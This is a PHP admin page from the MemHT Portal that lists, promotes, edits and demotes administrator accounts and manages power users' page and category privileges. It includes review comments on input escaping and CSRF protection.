<?php
/********************************************************************************
- MemHT Portal -
Copyright (C) 2007 by Miltenovik Manojlo
http://www.memht.com
This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License along
with this program; if not, see <http://www.gnu.org/licenses/> (GPLv2)
or write to the Free Software Foundation, Inc., 51 Franklin Street,
Fifth Floor, Boston, MA 02110-1301, USA.
********************************************************************************/
// Refuse direct requests: this page is only meaningful when included by the
// admin front controller (presumably admin.php), which defines _LOAD_PAGE_.
if (!defined("_LOAD_PAGE_")) {
    die("<table style='padding: 2px; border: 1px solid #999; background-color: #EEE; font-family: Verdana; font-size: 10px;' align='center'><tr><td><b>Error:</b> This file cannot be opened directly!</td></tr></table>");
}

// Request parameters. Free-text values go through the project's inCode()
// input filter; ids and ranks are cast to int so only integers reach SQL.
$op = "";
if (isset($_GET['op'])) {
    $op = inCode($_GET['op']);
}
$ok = false;
if (isset($_GET['ok'])) {
    $ok = inCode($_GET['ok']);
}
$id = 0;
if (isset($_GET['id'])) {
    $id = intval($_GET['id']);
}
$rank = 0;
if (isset($_POST['rank'])) {
    $rank = intval($_POST['rank']);
}
$username = "";
if (isset($_POST['username'])) {
    $username = inCode($_POST['username']);
}
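/**
 * Render the administrator list: every account in memht_utenti with rank > 1.
 *
 * Reads $dblink (DB wrapper), $siteConfig['timestamp'] (DATE_FORMAT pattern)
 * and $userid (the logged-in admin's id) from the global scope. Prints HTML
 * directly and returns nothing.
 *
 * Rows for id 1 and for the current user show a "locked" icon instead of the
 * edit/delete links, so an admin cannot demote or remove themselves here.
 */
function adminList() {
    global $dblink, $siteConfig, $userid;
    $n = 0;
    echo "<table width='100%' align='center' cellspacing='1' cellpadding='0' class='std_nicetable'>";
    echo "<thead>\n";
    echo "<tr><td>"._USERNAME_."</td><td>"._LEVEL_."</td><td width='15%'>"._LASTIP_."</td><td width='20%'>"._LASTLOGIN_."</td><td width='1%'> </td></tr>\n";
    echo "</thead>\n";
    echo "<tbody>\n";
    // NOTE(review): $siteConfig['timestamp'] is interpolated into the SQL
    // string. It is site configuration rather than request input, so it is
    // assumed to be a trusted DATE_FORMAT pattern — confirm where it is set.
    $result = $dblink->get_list("SELECT id,user,rank,lastip,DATE_FORMAT(lastlogin, '".$siteConfig['timestamp']."') as lastlogin FROM memht_utenti WHERE rank>1 ORDER BY rank DESC, user ASC");
    foreach ($result as $row) {
        $id = intval($row['id']);
        $user = outCode($row['user']);
        $rankvalue = intval($row['rank']);
        $lastip = outCode($row['lastip']);
        $lastlogin = $row['lastlogin'];
        // Only power users (rank 2) have per-page privileges to manage.
        $perm = ($rankvalue == 2) ? "<a href='admin.php?page=administrators&op=privs&id=$id' title='"._PERMISSION_."'><img src='admin/icons/config.png' border='0' alt='"._PERMISSION_."'></a> " : "";
        switch ($rankvalue) {
            case 2:
                $rank = _POWERUSER_;
                $rankcolor = "#000";
                break;
            case 3:
                $rank = _ADMIN_;
                $rankcolor = "#06F";
                break;
            case 4:
                $rank = _SUPERADMIN_;
                $rankcolor = "#900";
                break;
            default:
                // Any other rank > 1 is unexpected data; show the raw number
                // instead of leaving $rank and $rankcolor undefined.
                $rank = $rankvalue;
                $rankcolor = "#000";
                break;
        }
        // Alternate row classes for readability.
        $class = (($n++ % 2) != 0) ? "hlight" : "clean";
        if ($id == 1 || $id == $userid) {
            $operations = "<img src='images/key.png' alt='"._LOCKED_."' title='"._LOCKED_."'>";
        } else {
            $operations = "{$perm}<a href='admin.php?page=administrators&op=editAdmin&id=$id' title='"._MODIFY_."'><img src='images/edit.gif' alt='"._MODIFY_."' border='0'></a> <a href='admin.php?page=administrators&op=deleteAdmin&id=$id' title='"._DELETE_."'><img src='images/delete.gif' alt='"._DELETE_."' border='0'></a>";
        }
        echo "<tr><td class='$class'><a href='index.php?page=users&op=userInfo&uid=$id' title='$user'><span style='color:{$rankcolor};'><b>$user</b></span></a></td><td class='$class'>$rank</td><td class='$class'><a href='admin.php?page=security&op=findip&ok=true&ip=$lastip' title='"._FIND_." $lastip'>$lastip</a></td><td class='$class' nowrap>$lastlogin</td><td class='$class' align='right' nowrap>$operations</td></tr>\n";
    }
    echo "</tbody>\n";
    echo "</table>";
}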
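/**
 * Promote an existing account to an administrator rank.
 *
 * @param string $username account name, already passed through inCode() by the caller
 * @param int    $rank     target rank: 2 (power user), 3 (admin) or 4 (super admin)
 * @param bool   $ok       false prints the form; true processes the submission
 *
 * Prints HTML (the form, an error box, or a meta-refresh redirect) and
 * returns nothing. Uses $dblink from the global scope.
 */
function add($username, $rank, $ok = false) {
    global $dblink;
    if (!$ok) {
        echo "<table width='100%' align='center' cellspacing='0' cellpadding='1'>\n";
        echo "<form name='addadmin' method='post' action='admin.php?page=administrators&op=addAdmin&ok=true'>\n";
        echo "<tr><td width='25%'><b>"._USERNAME_."</b></td><td><input type='text' name='username' size='20' maxlength='255'> <input type='button' value='"._FIND_."' onClick=\"openPopup('inc/popwin/finduser.php?form=addadmin&element=username&username='+document.forms['addadmin'].elements['username'].value+'','350','400');\"></td></tr>\n";
        echo "<tr><td><b>"._LEVEL_."</b></td><td>";
        echo "<select name='rank'>\n";
        echo "<option value='0' selected>"._SELECT_."</option>\n";
        echo "<option value='2'>"._POWERUSER_."</option>\n";
        echo "<option value='3'>"._ADMIN_."</option>\n";
        echo "<option value='4'>"._SUPERADMIN_."</option>\n";
        echo "</select></td></tr>\n";
        echo "<tr><td colspan='2'><input type='submit' name='Submit' value='"._ADD_."'></td></tr>\n";
        echo "</form>\n";
        echo "</table>\n";
        return;
    }

    $rank = intval($rank);
    $msg = "";
    // Only the ranks offered by the form are valid. The old test (rank == 0)
    // let any other integer through to the UPDATE.
    if (!in_array($rank, array(2, 3, 4), true)) {
        $msg = _LEVEL_." ".strtolower(_FIELD_)." ".strtolower(_REQUIRED_);
    } elseif ($username == "") {
        $msg = _USERNAME_." ".strtolower(_FIELD_)." ".strtolower(_REQUIRED_);
    }
    if ($msg != "") {
        echo "<div align='center' id='errorText'><b>$msg</b></div>";
        return;
    }

    // NOTE(review): this lookup relies on inCode() having made $username safe
    // for an SQL string literal — confirm that helper escapes quotes.
    $row = $dblink->get_row("SELECT id FROM memht_utenti WHERE user='$username'");
    $id = isset($row['id']) ? intval($row['id']) : 0;
    if ($id == 0) {
        // No account with that name: report it instead of issuing an UPDATE
        // against id 0, which silently did nothing and then redirected.
        echo "<div align='center' id='errorText'><b>"._USERNAME_." ".strtolower(_FIELD_)." ".strtolower(_REQUIRED_)."</b></div>";
        return;
    }
    if ($id == 1) {
        // The primary super-admin account is locked, as in edit() and delete().
        echo "<div align='center' id='errorText'><b>"._LOCKED_."</b></div>";
        return;
    }

    if (memRunHooks('AddAdmin', array($id))) {
        $dblink->query("UPDATE memht_utenti SET rank='$rank' WHERE id=$id");
        memRunHooks('AddAdminEnd', array($id));
    }
    // Power users go straight to the per-page privilege editor.
    $link = ($rank == 2) ? "&op=privs&id=$id" : "";
    echo "<meta http-equiv='refresh' content='0;URL=admin.php?page=administrators{$link}'>";
}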
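/**
 * Change the rank of an existing administrator.
 *
 * @param int  $id   account id; id 1 (the primary super-admin) is refused
 * @param int  $rank posted rank: 2 (power user), 3 (admin) or 4 (super admin)
 * @param bool $ok   false prints the form; true processes the submission
 *
 * Prints HTML (the form, an error box, or a meta-refresh redirect) and
 * returns nothing. Uses $dblink from the global scope.
 */
function edit($id, $rank, $ok = false) {
    global $dblink;
    $id = intval($id);
    if ($id <= 1) {
        // id 1 cannot be modified through this page.
        echo "<div align='center' id='errorText'><b>"._LOCKED_."</b></div>";
        return;
    }

    if (!$ok) {
        $row = $dblink->get_row("SELECT user,rank FROM memht_utenti WHERE id=$id");
        // Missing row (unknown id) yields an empty form instead of notices.
        $username = isset($row['user']) ? outCode($row['user']) : "";
        $rank = isset($row['rank']) ? intval($row['rank']) : 0;
        echo "<table width='100%' align='center' cellspacing='0' cellpadding='1'>\n";
        echo "<form name='addadmin' method='post' action='admin.php?page=administrators&op=editAdmin&id=$id&ok=true'>\n";
        echo "<tr><td width='25%'><b>"._USERNAME_."</b></td><td><input type='text' name='username' value=\"$username\" size='20' maxlength='255' disabled></td></tr>\n";
        echo "<tr><td><b>"._LEVEL_."</b></td><td>";
        echo "<select name='rank'>\n";
        echo "<option value='0'>"._SELECT_."</option>\n";
        $ranks = array(2 => _POWERUSER_, 3 => _ADMIN_, 4 => _SUPERADMIN_);
        foreach ($ranks as $value => $label) {
            $selected = ($rank == $value) ? " selected" : "";
            echo "<option value='$value'{$selected}>$label</option>\n";
        }
        echo "</select></td></tr>\n";
        echo "<tr><td colspan='2'><input type='submit' name='Submit' value='"._MODIFY_."'></td></tr>\n";
        echo "</form>\n";
        echo "</table>\n";
        return;
    }

    $rank = intval($rank);
    // Only the ranks offered by the form are valid; the old test (rank == 0)
    // let any other integer through to the UPDATE.
    if (!in_array($rank, array(2, 3, 4), true)) {
        $msg = _LEVEL_." ".strtolower(_FIELD_)." ".strtolower(_REQUIRED_);
        echo "<div align='center' id='errorText'><b>$msg</b></div>";
        return;
    }
    if (memRunHooks('EditAdmin', array($id))) {
        $dblink->query("UPDATE memht_utenti SET rank='$rank' WHERE id=$id");
        memRunHooks('EditAdminEnd', array($id));
    }
    // Power users go straight to the per-page privilege editor.
    $link = ($rank == 2) ? "&op=privs&id=$id" : "";
    echo "<meta http-equiv='refresh' content='0;URL=admin.php?page=administrators{$link}'>";
}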
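/**
 * Demote an administrator back to a normal user (rank 1) and drop their
 * page and category grants.
 *
 * @param int  $id account id; id 1 (the primary super-admin) is refused
 * @param bool $ok false prints a yes/no confirmation; true performs the demotion
 *
 * Prints HTML (confirmation, error box, or a meta-refresh redirect) and
 * returns nothing. Uses $dblink from the global scope.
 *
 * NOTE(review): the confirmation is a plain GET link (ok=true) with no
 * request token; confirm the admin framework applies CSRF protection
 * elsewhere before relying on this page alone.
 */
function delete($id, $ok = false) {
    global $dblink;
    $id = intval($id);
    if ($id <= 1) {
        echo "<div align='center' id='errorText'><b>"._LOCKED_."</b></div>";
        return;
    }
    if (!$ok) {
        echo "<div align='center'><b>"._SUREDELETEADMIN_."</b><br><a href='admin.php?page=administrators&op=deleteAdmin&id=$id&ok=true' title='"._YES_."'>"._YES_."</a> - <a href='admin.php?page=administrators' title='"._NO_."'>"._NO_."</a></div>";
        return;
    }
    if (memRunHooks('DeleteAdmin', array($id))) {
        $dblink->query("UPDATE memht_utenti SET rank=1 WHERE id=$id");
        $dblink->query("DELETE FROM memht_privs WHERE userid=$id");
        // Clear the per-category grants written by managePrivs() for both
        // page types. Previously only 'news' was cleared (leaving stale
        // 'download' rows) and it ran even when the hook vetoed the demotion.
        $dblink->query("DELETE FROM memht_utenti_accesspages WHERE u_id='$id' and pages='news' ");
        $dblink->query("DELETE FROM memht_utenti_accesspages WHERE u_id='$id' and pages='download' ");
        memRunHooks('DeleteAdminEnd', array($id));
    }
    echo "<meta http-equiv='refresh' content='0;URL=admin.php?page=administrators'>";
}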
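/**
 * Return the sorted list of admin page names: every entry of admin/pages/
 * except "." / ".." and anything whose name contains "html", passed through
 * the project's file_name() helper.
 *
 * @return array list of page names (empty when the directory cannot be read)
 */
function managePrivs_pages() {
    $filearray = array();
    $handle = opendir('admin/pages/');
    if ($handle === false) {
        // Unreadable directory: nothing can be granted; caller renders an empty form.
        return $filearray;
    }
    while (false !== ($file = readdir($handle))) {
        // eregi() was removed in PHP 7; stripos() is the case-insensitive
        // substring test it performed here.
        if ($file != "." && $file != ".." && stripos($file, "html") === false) {
            $filearray[] = file_name($file);
        }
    }
    closedir($handle);
    sort($filearray);
    return $filearray;
}

/**
 * Print one checkbox per row of $table for user $id, pre-checked when a
 * matching memht_utenti_accesspages row exists for $pages.
 *
 * @param int    $id           user id (already cast to int)
 * @param string $pages        'news' or 'download' — a literal, never request input
 * @param string $inputName    HTML name of the checkbox group
 * @param string $table        category table — a literal, never request input
 * @param bool   $topLevelOnly skip rows whose 'parent' column is not 0
 */
function managePrivs_categoryBoxes($id, $pages, $inputName, $table, $topLevelOnly) {
    global $dblink;
    echo "<tr><td> </td><td>";
    $rows = $dblink->get_list("SELECT * FROM $table order by id");
    foreach ($rows as $row) {
        if ($topLevelOnly && $row['parent'] != 0) {
            continue;
        }
        $catid = intval($row['id']);
        $sql = "SELECT a_id FROM memht_utenti_accesspages WHERE u_id=$id and a_id=$catid and pages='$pages'";
        $checked = ($dblink->get_num($sql) == 1) ? "checked" : "";
        // Category names come from the database; encode them like the other
        // DB-sourced text on this page.
        echo "<input type='checkbox' name='$inputName' value='$catid' $checked>".outCode($row['nome'])."<br>";
    }
    echo "</td></tr>";
}

/**
 * Print the privilege form for power user $id: one checkbox per admin page,
 * plus category checkboxes under the News and Download rows.
 *
 * @param int    $id        user id (already cast to int)
 * @param string $username  display name, already passed through outCode()
 * @param array  $filearray page names from managePrivs_pages()
 */
function managePrivs_form($id, $username, $filearray) {
    global $dblink;
    echo "<form name='mngadm' method='post' action='admin.php?page=administrators&op=privs&id=$id&ok=true'>\n";
    echo "<table width='100%' align='center' cellspacing='1' cellpadding='0' class='std_nicetable'>\n";
    echo "<thead>\n";
    echo "<tr><td colspan='2'><b>$username</b></td></tr>\n";
    echo "</thead>\n";
    echo "<tbody>\n";
    $pagesnow = array();
    $result = $dblink->get_list("SELECT page FROM memht_privs WHERE userid=$id");
    foreach ($result as $row) {
        $pagesnow[] = outCode($row['page']);
    }
    $n = 0;
    foreach ($filearray as $file) {
        $title = ucfirst($file);
        $granted = in_array($file, $pagesnow, true);
        $bold = $granted ? " style='font-weight:bold;'" : "";
        $slct = $granted ? " checked" : "";
        // Alternate row classes for readability.
        $class = (($n++ % 2) != 0) ? "hlight" : "clean";
        echo "<tr><td width='50%' class='$class'{$bold}>$title</td><td align='right' class='$class'><input type='checkbox' name='$file' value='1'$slct></td></tr>\n";
        if ($title == "News") {
            managePrivs_categoryBoxes($id, 'news', 'chk[]', 'memht_argomenti', false);
        } elseif ($title == "Download") {
            managePrivs_categoryBoxes($id, 'download', 'chk2[]', 'memht_download_categorie', true);
        }
    }
    echo "</tbody>\n";
    echo "</table>\n";
    echo "<input type='submit' name='Submit' value='"._SAVE_."' style='margin-top:2px;'>\n";
    echo "</form>\n";
}

/**
 * Replace user $id's category grants for $pages with the ids posted under
 * $_POST[$field].
 *
 * @param int    $id    user id (already cast to int)
 * @param string $pages 'news' or 'download' — a literal, never request input
 * @param string $field POST field holding the checked category ids
 */
function managePrivs_saveCategories($id, $pages, $field) {
    global $dblink;
    $dblink->query("DELETE FROM memht_utenti_accesspages WHERE u_id='$id' and pages='$pages'");
    // No box checked means the field is absent; the old count($chk) loop
    // assumed it was always an array.
    if (!isset($_POST[$field]) || !is_array($_POST[$field])) {
        return;
    }
    foreach ($_POST[$field] as $value) {
        // Posted ids were previously interpolated unescaped into the INSERT;
        // cast so only a positive integer ever reaches SQL.
        $catid = intval($value);
        if ($catid <= 0) {
            continue;
        }
        $dblink->query("INSERT INTO memht_utenti_accesspages VALUES($id,$catid,'$pages')");
    }
}

/**
 * Replace user $id's page grants and category grants with the submitted
 * checkboxes, then redirect to the administrator list.
 *
 * @param int   $id        user id (already cast to int)
 * @param array $filearray page names from managePrivs_pages(); only these
 *                         names are looked up in $_POST, so arbitrary field
 *                         names never reach the query
 */
function managePrivs_save($id, $filearray) {
    global $dblink;
    $dblink->query("DELETE FROM memht_privs WHERE userid=$id");
    $queryp = array();
    foreach ($filearray as $file) {
        if (isset($_POST[$file])) {
            $queryp[] = "('$id','$file')";
        }
    }
    if (count($queryp) > 0) {
        // An INSERT with no VALUES rows is a syntax error; skip it when
        // every page box is unchecked.
        $dblink->query("INSERT INTO memht_privs (userid,page) VALUES ".implode(",", $queryp));
    }
    managePrivs_saveCategories($id, 'news', 'chk');
    managePrivs_saveCategories($id, 'download', 'chk2');
    echo "<meta http-equiv='refresh' content='0;URL=admin.php?page=administrators'>";
}

/**
 * Manage the per-page privileges of a power user (rank 2).
 *
 * @param int  $id account id; must be > 1 and currently rank 2
 * @param bool $ok false prints the form; true saves the submission
 *
 * Prints HTML and returns nothing. Uses $dblink from the global scope.
 */
function managePrivs($id, $ok = false) {
    global $dblink;
    $id = intval($id);
    $row = $dblink->get_row("SELECT user,rank FROM memht_utenti WHERE id=$id");
    $username = isset($row['user']) ? outCode($row['user']) : "";
    $rank = isset($row['rank']) ? intval($row['rank']) : 0;
    if ($id <= 1 || $rank != 2) {
        // Only power users have a privilege list; id 1 is never editable here.
        echo "<div align='center' id='errorText'><b>"._LOCKED_."</b></div>";
        return;
    }
    $filearray = managePrivs_pages();
    if (!$ok) {
        managePrivs_form($id, $username, $filearray);
    } else {
        managePrivs_save($id, $filearray);
    }
}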
require_once("admin/inc/inc_header.php");
admin_page_title($page);

// Navigation box with the list / add links.
openTable();
echo "<div align='center' class='box'>";
echo "<a href='admin.php?page=administrators' title='"._LIST_."'><img src='admin/icons/list.png' border='0' title='"._LIST_."' align='top'> "._LIST_."</a>";
echo " - <a href='admin.php?page=administrators&op=addAdmin' title='"._ADD_."'><img src='admin/icons/add.png' border='0' title='"._ADD_."' align='top'> "._ADD_."</a>";
echo "</div>";
closeTable();

// Dispatch on the requested operation; anything unrecognised shows the list.
openTable();
if ($op === "addAdmin") {
    add($username, $rank, $ok);
} elseif ($op === "editAdmin") {
    edit($id, $rank, $ok);
} elseif ($op === "deleteAdmin") {
    delete($id, $ok);
} elseif ($op === "privs") {
    managePrivs($id, $ok);
} else {
    adminList();
}
closeTable();

require_once("admin/inc/inc_footer.php");
?>